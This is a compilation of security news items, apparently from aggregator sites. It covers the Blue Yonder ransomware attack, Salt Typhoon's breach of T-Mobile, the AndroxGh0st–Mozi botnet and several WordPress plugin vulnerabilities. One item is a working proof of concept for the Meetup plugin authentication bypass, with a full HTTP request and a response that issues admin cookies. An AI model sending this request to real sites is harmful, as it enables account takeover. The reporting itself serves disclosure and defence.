The incident is typical of the heightened threats organizations face during the holidays, when most companies reduce their security operations staff by around 50%.

Source: Ned Snowman via Shutterstock

A disruptive ransomware attack on Blue Yonder, a supply chain management software provider for major retailers, consumer product companies, and manufacturers, highlights the heightened risk organizations face during the busy holiday season.

A Nov. 21 attack on Blue Yonder affected infrastructure that the company uses to host a variety of managed services for customers, which include 46 of the top 100 manufacturers, 64 of the top 100 consumer product goods makers, and 76 of the top 100 retailers in the world.

**Major UK Supermarket Chains Hit in Cyberattack**

Among those reportedly most affected by the attacks are Morrisons and Sainsbury's, two of the UK's largest supermarket chains. British media outlet The Grocer quoted a Morrisons spokesperson as describing the Blue Yonder attack as affecting the smooth delivery of goods to stores in the UK. Availability of some product lines at wholesale and convenience locations could drop to as low as 60% of normal availability, the media outlet reported.

In the US, Starbucks reported the Blue Yonder attack affecting a back-end process for employing scheduling and time-tracking. But besides that, there have been no confirmed reports so far of widespread disruptions resulting from the attack. Blue Yonder's US customers include Kimberly-Clark, Anheuser-Busch, Campbell's, Best Buy, Wegmans, and Walgreens.

Related:Dark Reading Confidential: Meet the Ransomware Negotiators

In its initial disclosure on Nov. 21, Blue Yonder said it experienced disruptions to its managed services hosted environment, which it determined was the result of a ransomware attack. The company said it was actively monitoring its Blue Yonder Azure public cloud environment but had not spotted any suspicious activity.

"Since learning of the incident, the Blue Yonder team has been working diligently together with external cybersecurity firms to make progress in their recovery process," a Blue Yonder spokesperson said in an emailed statement to Dark Reading. "We have implemented several defensive and forensic protocols" to mitigate the issue.

"We have notified relevant customers and will continue to communicate as appropriate. Additional updated information will be provided on our website as our investigation proceeds," the spokesperson added. The statement did not provide any kind of timeline by which it hopes to completely restore its systems.

**Ripple Effect From Blue Yonder Hack**

The fallout from the Blue Yonder attack is similar to that from other major supply chain attacks in recent times, including the ones on Progress Software's MOVEit file transfer software, Kaseya, WordPress, and Polyfill.io. In each instance, the threat actors behind the attacks managed to impact a broad swath of organizations by targeting a single trusted player in the software supply chain.

Related:Fancy Bear 'Nearest Neighbor' Attack Uses Nearby Wi-Fi Network

The Blue Yonder incident is also typical of the attacks that tend to happen around holidays and during weekends, when IT departments tend to be less than fully staffed. Research that Semperis conducted showed that 86% of ransomware victims over the past year were targeted either on a holiday or on a weekend. More than six in 10 respondents in the survey said they experienced a ransomware attack during a corporate event.

Semperis found that while most of the organizations in its survey maintained a round-the-clock security operations capability, some 85% scaled back security operations center (SOC) staffing levels by up to 50% outside normal business hours.

**Opening the Door to Cyberattacks**

"Despite widespread cybersecurity efforts, many organizations are unintentionally opening a door to ransomware by reducing their defenses during weekends and holidays," says Jeff Wichman, director of incident response at Semperis. "Attackers clearly expect this behavior and target these periods — as well as other material corporate events that might signal distracted or reduced defenses — to strike.

Related:Yakuza Victim Data Leaked in Japanese Agency Attack

Wichman says the Semperis study looked at nearly 1,000 organizations in the US, the UK, France, and Germany. In each country, the vast majority of businesses reduce staffing by up to 50% on holidays and weekends. In Germany, 75% of organizations downsized staff by as much as 50% on holidays and weekends. "In security, you can’t wax or wane, and your defenses need to be constant" and around the clock, he says.

Wichman recommends that organizations maintain at least 75% of their regular staffing levels on holidays and weekend to maintain operational resiliency.

Nick Tausek, lead security automation architect at Swimlane, says incidents like the attack on Blue Yonder highlight why cyber hygiene is important at all times of the year, but especially so during the holiday season: "User training, frequent, comprehensive backups, and a tested disaster recovery plan are the three biggest protections against cybercriminals and ransomware operators during the busy holiday season."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Ransomware Attack on Blue Yonder Hits Starbucks, Supermarkets

The company says no sensitive data was stolen, but federal agencies claim otherwise. CISA and FBI sources said attackers accessed all records of specific customers and the private communications of targeted individuals.

Source: GK Images via Alamy Stock Photo

T-Mobile USA is the latest telecommunications provider to acknowledge it's been targeted by the Chinese advanced persistent threat (APT) known as Salt Typhoon, as part of a widescale and unsettling cyber-espionage operation that hacked numerous US and international telecommunications companies aiming to steal sensitive information.

The second-largest wireless carrier in the US is currently investigating and monitoring a cyberattack "consistent" with the recent activities of the Chinese state-sponsored cyber actor, a company spokesperson told Dark Reading late on Nov. 18 in a statement.

However, so far, the company has "had no evidence of access or exfiltration of any customer or other sensitive information as other companies may have experienced," according to T-Mobile. Moreover, "there have been no significant impacts to T-Mobile systems or data," the company said. T-Mobile, based in Bellevue, Wash., has more than 127.5 million US subscribers.

However, T-Mobile's account differs from reports in which federal agencies said that there is evidence that the threat actor gained access to sensitive data, according to a published report in the Wall Street Journal that cited sources from the FBI and Cybersecurity and Infrastructure Security Agency (CISA).

Related:Akamai Reports Third Quarter 2024 Financial Results

According to those agencies, Salt Typhoon accessed call records of specific customers, private communications of targeted individuals, and information about law enforcement surveillance requests in an effort to gather intelligence on high-ranking US national security and policy officials, the report said.

**T-Mo Cyberattack: Full Impact Yet Unknown**

All in all, the wave of recent attacks by Salt Typhoon that have rocked telecom providers both at home and abroad — including AT&T, Verizon, and Lumen Technologies — is "unnerving," says one industry expert.

"No one is pleased with the idea that the Chinese government has access to information about us from our cellphones, one of the more intimate devices used in our daily life," says Jim Routh, former CISO at Aetna, American Express, and CVS and currently chief trust officer at security firm Saviynt. "The practical reality is that this incident does little to change the risk of a significant impact to US consumers."

As T-Mobile is not yet acknowledging that data was even stolen, let alone what type of data, the full impact of the attack won't be known for some time, Paul Bischoff, consumer privacy advocate at Comparitech, notes. That said, there is a chance it's not as serious as some fear depending on what is revealed, he observes.

Related:Critical WordPress Plug-in Flaw Exposes 4M Sites to Takeover

"Metadata like call times and participants, although concerning, is not nearly as scary as state-sponsored threat actors stealing texts and audio messages," Bischoff says.

Still, the national security implications of Chinese threat actors rooting around in the personal data of mobile device users, and then using that data to "island hop into a myriad of government agencies and critical infrastructures … are profound," observes another security expert, Tom Kellermann, senior vice president of cyber strategy at Contrast Security.

"This is the third telecom provider compromised by \[China\] in the last 12 months," Kellermann says. "The systematic campaign of infiltration will take months to root out."

**Further Salt Typhoon Telecom Attacks Imminent?**

Indeed, experts have surmised that the idea behind Salt Typhoon's wave of attacks is to leverage the useful information that can be gleaned from people's personal communications to launch further malicious activity and/or potentially disrupt communications to further China's interests in its political and economic conflict with the US.

"We can expect to see additional attacks by this group in the coming months, as \[it\] works to access the phone lines and records of national security officials and politicians," notes Chris Hauk, consumer privacy champion at Pixel Privacy.

Related:DHS Releases Secure AI Framework for Critical Infrastructure

The incidents are certainly a rude awakening for telecommunications and other critical infrastructure providers, and demonstrate just how vulnerable they are to compromise by organized cybercriminal groups, experts say. Indeed, T-Mobile itself doesn't have the best track record in cybersecurity, Bischoff notes, as just last month the mobile carrier paid a $31.5 million settlement to resolve multiple data breaches that took place over three years.

The threat of imminent further attacks by Salt Typhoon demand that telecom providers act fast to shore up cybersecurity efforts. "We can expect to continue to see attacks like this, as well as traditional ransomware attacks," Hauk notes, "as state actors continue to wage a cyberwar against the United States and its vulnerable infrastructure."

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Salt Typhoon Hits T-Mobile as Part of Telecom Attack Spree

WordPress Really Simple Security plugin versions prior to 9.1.2 proof of concept authentication bypass exploit.

WordPress Really Simple Security Authentication Bypass

A vulnerability found in the Really Simple Security plug-in allows an attacker to remotely gain access to any account on an affected website, including the administrator, when 2FA is enabled.

Source: Primakov via Shutterstock

A WordPress plug-in installed on more than 4 million websites exposes them to full administrative takeover through a scripting flaw that potentially can be used to launch large-scale automated attacks against multiple sites.

Researchers from Wordfence called the authentication bypass flaw "one of the more serious vulnerabilities" that they have ever identified, uncovering it earlier this month in a plug-in from Really Simple Security that provides WordPress security features for sites, according to a recent blog post. The flaw, rated with a critical CVSS score of 9.8, affects the Really Simple Security Pro and Pro Multisite plug-ins, versions 9.0.0 to 9.1.1.1.

"The vulnerability makes it possible for an attacker to remotely gain access to any account on the site, including the administrator account, when the two-factor authentication (2FA) feature is enabled," Wordfence security researcher Istvan Marton wrote in the post.

The flaw exists due to improper user check error handling in the two-factor REST API actions with the "check\_login\_and\_get\_user" function, according to Wordfence. Moreover, because the flaw is scriptable, it can be weaponized against numerous WordPress sites simultaneously in an automated way.

Due to the critical nature of the bug, Wordfence acted quickly after discovering the flaw on Nov. 6 to work with the Really Simple Security team to mitigate it. After immediately disclosing the flaw to the vendor, a patched update, version 9.1.2, was released publicly on Nov. 12. Then, on Wordfence's advice, Really Simple Security force-updated all sites running the plug-in two days later.

Related:Akamai Reports Third Quarter 2024 Financial Results

Still, Wordfence recommended that any administrator with a site that uses the plug-in confirm that it has been automatically updated to the patched version, as "it appears that sites without a valid license may not have auto-updates functioning," Marton noted in the post.

**New 'Really Simple Security' Feature Introduces Flaw**

The Really Simple Security plug-in was formerly known as Really Simple SSL; it was renamed in its latest major version update, which also expanded the plug-in with security features such as log-in protection, vulnerability detection, and 2FA.

During this revamp, one of the features adding 2FA "was insecurely implemented" to introduce the flaw, which allows an attacker to create a simple request to gain access to any user account with 2FA on.

Specifically, the plug-in uses the skip\_onboarding() function in the Rsssl\_Two\_Factor\_On\_Board\_Api class to handle authentication via REST API that returns a WP\_REST\_Response error in case of a failure. However, this is not handled within the function, which "means that even in the case of an invalid nonce, the function processing continues and invokes authenticate\_and\_redirect()," Marton wrote. This "authenticates the user based on the user id passed in the request, even when that user’s identity hasn’t been verified," he wrote.

Related:DHS Releases Secure AI Framework for Critical Infrastructure

Ultimately, this makes it possible for threat actors to bypass authentication and gain access to arbitrary accounts on sites running a vulnerable version of the plug-in.

"As always, authentication bypass vulnerabilities and resulting access to high privileged user accounts make it easy for threat actors to completely compromise a vulnerable WordPress site and further infect it," Marton explained.

**Wordfence: Spread the Word, Check Your Plug-ins**

Due to its widespread use as a foundation for millions of websites, the WordPress platform and its plug-ins especially are a notoriously popular threat target for threat actors, giving them easy access to a broad attack surface. Attackers particularly like to exploit singular plug-ins with large install bases, making flaws like the one found in Really Simple Security's plug-in an attractive target.

Related:Microsoft Pulls Exchange Patches Amid Mail Flow Issues

Even though most sites using the plug-in should have been updated already, Wordfence still advises that users spread the word to ensure the broadest patch coverage possible due to the critical nature of the flaw.

"If you know someone who uses these plugins on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk," Marton wrote in the post.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Critical WordPress Plug-in Flaw Exposes 4M Sites to Takeover

A critical authentication bypass vulnerability has been disclosed in the Really Simple Security (formerly Really Simple SSL) plugin for WordPress that, if successfully exploited, could grant an attacker to remotely gain full administrative access to a susceptible site.
The vulnerability, tracked as CVE-2024-10924 (CVSS score: 9.8), impacts both free and premium versions of the plugin. The

Urgent: Critical WordPress Plugin Vulnerability Exposes Over 4 Million Sites

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.
"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a

IoT Security / Vulnerability

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.

"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a new report.

AndroxGh0st is the name given to a Python-based cloud attack tool that's known for its targeting of Laravel applications with the goal of sensitive data pertaining to services like Amazon Web Services (AWS), SendGrid, and Twilio.

Active since at least 2022, it has previously leveraged flaws in the Apache web server (CVE-2021-41773), Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access, escalate privileges, and establish persistent control over compromised systems.

Earlier this March, U.S. cybersecurity and intelligence agencies revealed that attackers are deploying the AndroxGh0st malware to create a botnet for "victim identification and exploitation in target networks."

The latest analysis from CloudSEK reveals a strategic expansion of the targeting focus, with the malware now exploiting an array of vulnerabilities for initial access -

*   CVE-2014-2120 (CVSS score: 4.3) - Cisco ASA WebVPN login page XSS vulnerability
*   CVE-2018-10561 (CVSS score: 9.8) - Dasan GPON authentication bypass vulnerability
*   CVE-2018-10562 (CVSS score: 9.8) - Dasan GPON command injection vulnerability
*   CVE-2021-26086 (CVSS score: 5.3) - Atlassian Jira path traversal vulnerability
*   CVE-2021-41277 (CVSS score: 7.5) - Metabase GeoJSON map local file inclusion vulnerability
*   CVE-2022-1040 (CVSS score: 9.8) - Sophos Firewall authentication bypass vulnerability
*   CVE-2022-21587 (CVSS score: 9.8) - Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability
*   CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
*   CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
*   CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability

"The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings."

The attacks have also been observed leveraging unauthenticated command execution flaws in Netgear DGN devices and Dasan GPON home routers to drop a payload named "Mozi.m" from different external servers ("200.124.241\[.\]140" and "117.215.206\[.\]216").

Mozi is another well-known botnet that has a track record of striking IoT devices to co-opt them into a malicious network for conducting distributed denial-of-service (DDoS) attacks.

While the malware authors were arrested by Chinese law enforcement officials in September 2021, a precipitous decline in Mozi activity wasn't observed until August 2023, when unidentified parties issued a kill switch command to terminate the malware. It's suspected that either the botnet creators or Chinese authorities distributed an update to dismantle it.

AndroxGh0st's integration of Mozi has raised the possibility of a possible operational alliance, thereby allowing it to propagate to more devices than ever before.

"AndroxGh0st is not just collaborating with Mozi but embedding Mozi's specific functionalities (e.g., IoT infection and propagation mechanisms) into its standard set of operations," CloudSEK said.

"This would mean that AndroxGh0st has expanded to leverage Mozi's propagation power to infect more IoT devices, using Mozi's payloads to accomplish goals that otherwise would require separate infection routines."

"If both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both AndroxGh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and efficiency of their combined botnet operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

WordPress Meetup plugin versions 0.1 and below suffer from an authentication bypass vulnerability.

    # CVE-2024-50483Meetup <= 0.1 - Authentication Bypass via Account Takeover# Description:The Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.```CVE: CVE-2024-50483CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS Score: 9.8Slugs: meetup```Note: You need to know the users email address you want to login as.POC---```POST /wp-admin/admin-ajax.php HTTP/1.1Host: kubernetes.docker.internalContent-Type: application/x-www-form-urlencodedContent-Length: 149action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/```Response--```HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 21:37:23 GMTServer: Apache/2.4.57 (Debian)X-Powered-By: PHP/8.2.13X-Robots-Tag: noindexX-Content-Type-Options: nosniffExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Referrer-Policy: strict-origin-when-cross-originX-Frame-Options: SAMEORIGINSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnlySet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnlySet-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnlyContent-Length: 0Content-Type: text/html; charset=UTF-8```

WordPress Meetup 0.1 Authentication Bypass

CloudSEK reports that the Androxgh0st botnet has integrated with the Mozi botnet and exploits a wide range of…

CloudSEK reports that the Androxgh0st botnet has integrated with the Mozi botnet and exploits a wide range of vulnerabilities in web applications and IoT devices. Learn about the specific vulnerabilities being targeted, the techniques used by the attackers, and how to protect your systems from this evolving threat.

Cybersecurity researchers at Contextual AI company, CloudSEK’s AI digital risk platform XVigil have uncovered a new development in the Androxgh0st botnet. This malicious network, initially targeting web servers since January 2024, has re-emerged after undergoing transformation.

Reportedly, the botnet now shares components from the infamous Mozi botnet, historically known for infecting internet-of-things (IoT) devices. The analysis of Androxgh0st‘s C&C logs revealed an operational change as the botnet now appears to be deploying Mozi-linked payloads. 

This means Androxgh0st may have integrated Mozi’s payload as a module within its botnet architecture, leveraging its IoT infection and propagation mechanisms. This expansion allows Androxgh0st to infect more IoT devices without needing separate infection routines, researchers observed during the investigation, shared exclusively with Hackread.com.

Furthermore, researchers noted an expansion of Androxgh0st’s attack methods. The botnet now targets vulnerabilities beyond web servers, including: 

*   **Cisco ASA:** Exploiting cross-site scripting (XSS) vulnerabilities to inject malicious scripts. 
*   **Atlassian JIRA:** Leveraging path traversal vulnerabilities (CVE-2021-26086) to access sensitive files. 
*   **PHP Frameworks:** Targeting vulnerabilities in Laravel (CVE-2018-15133) and PHPUnit (CVE-2017-9841) to gain backdoor access. 
*   **New Exploits:** The botnet demonstrates the ability to adapt by exploiting recently discovered vulnerabilities like CVE-2023-1389 (TP-Link) and CVE-2024-36401 (GeoServer), showcasing its evolving capabilities.

*   **Metabase:** Local file inclusion vulnerabilities that can lead to information disclosure and potential remote code execution.
*   **Apache Web Server:** The botnet also exploits **CVE-2021-41773, affecting** Apache versions 2.4.49 and 2.4.50 to run arbitrary code and potentially gain sensitive data or credentials.
*   **IoT Devices:** By integrating Mozi botnet capabilities, Androxgh0st can now target a broader range of IoT devices, including routers, security cameras, and other network-connected devices. 

The botnet is also targeting vulnerabilities in Metabase, Sophos Firewall, Oracle E-Business Suite, OptiLink ONT1GEW GPON, PHP CGI, TP-Link Archer AX21, WordPress Plugin Background Image Cropper, Netgear DGN devices, and GPON Home Routers, all vulnerable to remote code execution, information disclosure, and exploitation. 

“Androxgh0st actively deploys brute-force credential stuffing, command injection, file inclusion, and malware propagation. By leveraging Mozi’s IoT capabilities, Androxgh0st now exploits misconfigured routers and devices across a vast geographical range, infecting devices in Asia, Europe, and beyond,” researchers noted.

Mozi Botnet targeting GPON Router (Via CloudSEK)

Here’s a full list of countries being targeted by the Androxgh0st botnet. This list ranks countries by the number of devices targeted by the Androxgh0st botnet. Germany, at the top, has the most infected devices, while Singapore, at the bottom, has the least. However, all these countries are active targets of the botnet:

1.  Germany
2.  Turkey
3.  United States of America
4.  India
5.  Hong Kong Special Administrative Region
6.  Romania
7.  Portugal
8.  Poland
9.  Lithuania
10.  Slovenia
11.  Austria
12.  United Kingdom of Great Britain and Northern Ireland
13.  Korea (Republic of)
14.  Thailand
15.  Canada
16.  Spain
17.  Qatar
18.  Singapore

For your information, the Mozi botnet, which primarily targeted Netgear, Dasan, D-Link routers, and MVPower DVR Jaws servers, operated from China, India, and Albania. In 2021, Chinese law enforcement arrested its creators, forcing them to cooperate and distribute an update that killed the botnet’s ability to connect to the outside world in 2023.

The shared command infrastructure between Androxgh0st and Mozi suggests a high level of operational integration, possibly being controlled by the same cybercriminal group. This integration will affect web applications and IoT devices globally.

Organizations should adopt immediate patching for vulnerabilities exploited by Androxgh0st, monitor network traffic for suspicious connections and login attempts, and analyze HTTP and web server logs for signs of compromise.

1.  **P2Pinfect Botnet Now Targets Servers with Ransomware**
2.  **New Gorilla Botnet Hits 0.3 Million Devices in 100 Countries**
3.  **New Golang Botnet “Zergeca” Delivers Brutal DDoS Attacks**
4.  **Goldoon Botnet Hits D-Link Devices, Exploits 9-Year-Old Flaw**
5.  **Russian Hackers Hits Ubiquiti Routers for Data, Botnet Creation**

Androxgh0st Botnet Integrates Mozi, Expands Attacks on IoT Vulnerabilities

WordPress Automatic plugin versions 3.92.0 and below proof of concept exploit that demonstrates path traversal and server-side request forgery vulnerabilities.

WordPress Automatic 3.92.0 Path Traversal / Server-Side Request Forgery

A high-severity security flaw has been disclosed in the LiteSpeed Cache plugin for WordPress that could allow an unauthenticated threat actor to elevate their privileges and perform malicious actions.
The vulnerability, tracked as CVE-2024-50550 (CVSS score: 8.1), has been addressed in version 6.5.2 of the plugin.
"The plugin suffers from an unauthenticated privilege escalation vulnerability

Vulnerability / Website Security

A high-severity security flaw has been disclosed in the LiteSpeed Cache plugin for WordPress that could allow an unauthenticated threat actor to elevate their privileges and perform malicious actions.

The vulnerability, tracked as CVE-2024-50550 (CVSS score: 8.1), has been addressed in version 6.5.2 of the plugin.

"The plugin suffers from an unauthenticated privilege escalation vulnerability which allows any unauthenticated visitor to gain administrator level access after which malicious plugins could be uploaded and installed," Patchstack security researcher Rafie Muhammad said in an analysis.

LiteSpeed Cache is a popular site acceleration plugin for WordPress that, as the name implies, comes with advanced caching functionality and optimization features. It's installed on over six million sites.

The newly identified issue, per Patchstack, is rooted in a function named is\_role\_simulation and is similar to an earlier flaw that was publicly documented back in August 2024 (CVE-2024-28000, CVSS score: 9.8).

It stems from the use of a weak security hash check that could be brute-forced by a bad actor, thus allowing for the crawler feature to be abused to simulate a logged-in user, including an administrator.

However, a successful exploitation banks on the following plugin configuration -

*   Crawler -> General Settings -> Crawler: ON
*   Crawler -> General Settings -> Run Duration: 2500 – 4000
*   Crawler -> General Settings -> Interval Between Runs: 2500 – 4000
*   Crawler -> General Settings -> Server Load Limit: 0
*   Crawler -> Simulation Settings -> Role Simulation: 1 (ID of user with administrator role)
*   Crawler -> Summary -> Activate: Turn every row to OFF except Administrator

The patch put in place by LiteSpeed removes the role simulation process and updates the hash generation step using a random value generator to avoid limiting the hashes to 1 million possibilities.

"This vulnerability highlights the critical importance of ensuring the strength and unpredictability of values that are used as security hashes or nonces," Muhammad said.

"The rand() and mt\_rand() functions in PHP return values that may be 'random enough' for many use cases, but they are not unpredictable enough to be used in security-related features, especially if mt\_srand is used in a limited possibility."

CVE-2024-50550 is the third security flaw to be disclosed in LiteSpeed within the last two months, the other two being CVE-2024-44000 (CVSS score: 7.5) and CVE-2024-47374 (CVSS score: 7.2).

The development comes weeks after Patchstack detailed two critical flaws in Ultimate Membership Pro that could result in privilege escalation and code execution. But the shortcomings have been addressed in version 12.8 and later.

*   CVE-2024-43240 (CVSS score: 9.4) - An unauthenticated privilege escalation vulnerability that could allow an attacker to register for any membership level and gain the attached role for it

*   CVE-2024-43242 (CVSS score: 9.0) - An unauthenticated PHP object injection vulnerability that could allow an attacker to execute arbitrary code.

Patchstack is also warning that the ongoing legal drama between WordPress' parent Automattic and WP Engine has prompted some developers to abandon the WordPress.org repository, necessitating that users monitor appropriate communication channels to ensure they are receiving the latest information about possible plugin closures and security issues.

"Users who fail to manually install plugins removed from the WordPress.org repository risk not receiving new updates which can include important security fixes," Patchstack CEO Oliver Sild said. "This can leave websites exposed to hackers who commonly exploit known vulnerabilities and may take advantage over such situations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#wordpress